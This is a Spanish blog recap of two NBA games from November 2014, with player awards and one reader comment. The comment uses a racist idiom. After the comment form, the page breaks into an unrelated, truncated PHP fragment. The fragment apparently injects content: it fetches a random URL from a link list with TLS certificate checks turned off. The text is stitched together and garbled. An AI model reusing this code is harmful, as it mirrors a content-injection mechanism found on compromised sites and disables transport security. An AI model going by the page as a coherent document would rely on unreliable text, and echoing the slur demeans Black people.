La Crónica: Un festín para Howard

07 de November de 2014 por txusma

Noche de jueves noche de pocos partidos pero de calidad. Nada menos que un par de enfrentamientos entre cuatro de los gallitos del Oeste, cuatro equipos que seguramente veremos en la postemporada luchando por alcanzar las finales pero que en esta ocasión nos brindaron encuentros muy desiguales.

SPURS 81 – ROCKETS 98

Matt Bonner, Jeff Ayres y Aron Baynes. Éste era el juego interior de los Spurs anoche. Tiago Splitter sigue lesionado, Tim Duncan descansó y Dwight Howard se dio un festín en la zona. Al descanso, el pívot de los Rockets ya había anotado 20 puntos y capturado 12 rebotes y acabó el partido con 32 puntos, 16 rebotes y 2 tapones. Mientras Howard se montaba un chalet a ambos lados de la pista, los Spurs intentaban compensar la desventaja con su tiro exterior pero ayer estuvieron particularmente desafortunados. 0 de 12 en T3 en toda la primera parte (la peor marca de los Spurs en la era Popovich) y solo 2 aciertos de 20 intentos al final del partido. Con semejantes guarismos no debe estrañarnos que los Rockets acabaran el partido con Nick Johnson, Clint Capela y Joey Dorsey en pista. Aquello era una fiesta y todos estaban invitados. 6ª victoria de los Rockets, todas conseguidas por más de 10 puntos de diferencia, algo que no se veía en la liga desde 1985 (lo consiguieron los Denver Nuggets de Alex English y Fat Lever).

MAVERICKS 87 – BLAZERS 108

Al final de la primera parte nada hacía presagiar que la victoria acabaría cayendo del lado de los locales tan claramente. Los Mavs se fueron 4 puntos arriba al vestuario de la mano principalmente de un Dirk Nowitzki al nivel de sus grandes noches pero tras el descanso el panorama cambió. Los Blazers bajaron el culo, apretaron las tuercas y se pusieron a defender como si la vida les fuera en ello. ¿Resultado? Parcial de 38-15 en el tercer cuarto y el alemán condenado a anotar solo 2 puntos más antes del final del partido. Además, al otro de la cancha Damian Lillard y LaMarcus Aldridge causaban estragos y el banquillo de los de Oregón anotaba nada menos que 52 puntos con un 7 de 11 en tiros de 3. Si alguien pensaba que los resultados del año pasado de los Blazers fueron un golpe de suerte solo ha de ponerse a ver sus dos últimos partidos. Están aún mejor.

Premios


MVP:
 Popovich dispuso anoche la cubertería de plata y la vajilla de las mejores ocasiones para que Dwight Howard se pusiera las botas a costa de los Spurs. Sin nadie delante que le hiciese sombra, el pívot de los Rockets necesito apenas 33 minutos para anotar 32 puntos, atrapar 16 rebotes y taponar en 2 ocasiones. Se permitió el lujo incluso de firmar un porcentaje de tiros libres mejor que el de Harden. Noche redonda para DH12.

Rookie: Clint Capela disputó sus primeros minutos como jugador NBA, aunque sin mucho éxito: falló sus cuatro tiros libres y se quedó sin anotar. Tampoco anotó Papanikolau. Sí lo hizo Kyle Anderson, que se quedó en un 1 de 8 de tiros pero aportó 4 puntos, 8 rebotes, 4 asistencias y 2 robos. Para él es el premio.

Sorpresa: Buen papel de Isaiah Canaan en sustitución de Beverly. 12 puntos, 2 rebotes, 1 asistencia y 1 robo sin pérdidas de balón ante un Tony Parker al que superó claramente. Por un día podemos hablar de una sólida aportación del banco de los Blazers, con 33 puntos (13/19 tiros) entre Kaman, Blake y McCollum . Lo de que Howard tenga mejor porcentaje en libres que Harden supera la condición de sorpresa y roza el milagro.

Decepción: Sin Duncan ni Manu, esperábamos grandes cosas de Parker y Leonard. Ambos decepcionaron y así le fue a los Spurs frente a los Rockets. El alero falló 9 de sus 11 tiros de campo, aunque al menos aportó en el resto de facetas (4 rebotes, 5 asistencias, 4 robos). El base francés estuvo especialmente gris y firmó números de lo más mediocre: 6 puntos, 1 rebote, 1 asistencia y 2 pérdidas.

Mayor esfuerzo en vano: No hubo ninguna actuación realmente destacada anoche entre los perdedores. Nos podríamos quedar con el 9 de 11 en tiros logrado por Cory Joseph en la derrota en Houston y los 31 puntos conseguidos entre Dirk Nowitzki y Monta Ellis en Portland, pero si alguien hace un esfuerzo en vano es la NBA en su intento por lograr que Popovich alinée sus mejores hombres en los partidos con TV para todo el país. Adam Silver se lleva nuestro galardón.

 rockets

Imágenes | AP Photos / Getty Images

Comenta

Un comentario a esta entrada

  1. GreenPride dice:
    #1

    Que crack que es Pops. Que no quieres lentejas, pues toma dos cazos…. se la ha vuelto a jugar a la NBA igual que el año pasado. A ver si esta vez le ponen otra multa o ya le dejan por imposible.
    El Oeste va a ser de nuevo una merienda de negros: Clippers, Spurs, Thunder, Warriors, Rockets, Mavs, Suns, Grizzlies, Blazers, Pelicans e incluso los sorprendentes Kings, Nuggets, Wolves… va a haber verdaderas tortas por acceder a playoffs.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>